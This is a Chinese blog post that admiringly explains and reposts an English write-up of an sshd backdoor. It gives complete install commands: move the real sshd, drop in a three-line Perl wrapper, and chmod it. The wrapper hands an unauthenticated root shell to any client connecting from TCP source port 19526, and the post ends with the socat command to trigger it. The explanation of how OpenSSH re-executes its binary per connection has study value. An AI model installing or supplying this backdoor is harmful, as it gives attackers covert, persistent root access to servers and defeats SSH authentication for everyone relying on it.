一个巧妙的sshd后门

@沈沉舟 发了一个很有意思的sshd后门,原文见http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/,看了之后,觉得精巧得淫贱。

init首先启动的是/usr/sbin/sshd,是黑客写的Perl脚本.执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。原始的sshd监听端口建立了tcp连接后,会fork一个子进程处理具体工作。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到Perl脚本了。此时子进程标准输入输出已被重定向到套接字,getpeername能真的获取到客户端的TCP源端口,如果是19526 就执行sh给个shell。关于19526的来历,作者说“the string “LF” converted from ASCII to a big-endian 16 bit integer”,这里可以修改。
轻灵巧妙,叹为观止。附原文:

[Hacking-Contest] SSH Server wrapper

Posted on 

This blogpost shows how the SSH server can be replaced with a small wrapper script to allow full unauthenticated remote root access without disturbing the normal operation of the service. In order to install the wrapper script, the original SSH server must be renamed or moved to another directory. I have chosen to just move the binary from /usr/sbin/ to /usr/bin/:

cd /usr/sbin
mv sshd ../bin
vi sshd

Then type in the following small wrapper script:

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

Finally the wrapper script must be made executable e.g. with the following command:

chmod 755 sshd

In the normal operation of the ssh server, the wrapper script just executes the original sshd binary (which has been moved to /usr/bin/sshd) with all the given command-line arguments. If STDIN is a socket and the source port of the connected client happens to be 19526 (the string “LF” converted from ASCII to a big-endian 16 bit integer), the wrapper however executes /bin/sh instead, which gives the client an unauthenticated remote root shell.

Like many other network services, the OpenSSH server forks a new child process when receiving a new TCP connection. However, contrary to most other services, it doesn’t directly serve the client in the child process after the fork. Instead it re-executes its own binary (typically /usr/sbin/sshd) in the child process so that the client is handled by a new instance of the sshd process (which makes ASLR more effective by giving each child process a different randomized memory layout). For this child process, the file descriptors STDIN/STDOUT are connected to the client socket.

In order to exploit the backdoor to get a remote root shell, you have to connect to the SSH service from source port 19526, which can easily be achieved with the following command:

socat STDIO TCP4:target_ip:22,sourceport=19526
此条目发表在技术分类目录。将固定链接加入收藏夹。

一个巧妙的sshd后门》有 4 条评论

  1. zuhd说:

    还是觉得老的站点有感觉,一抹的wordpress,我已迷失。。。

发表评论

电子邮件地址不会被公开。 必填项已用*标注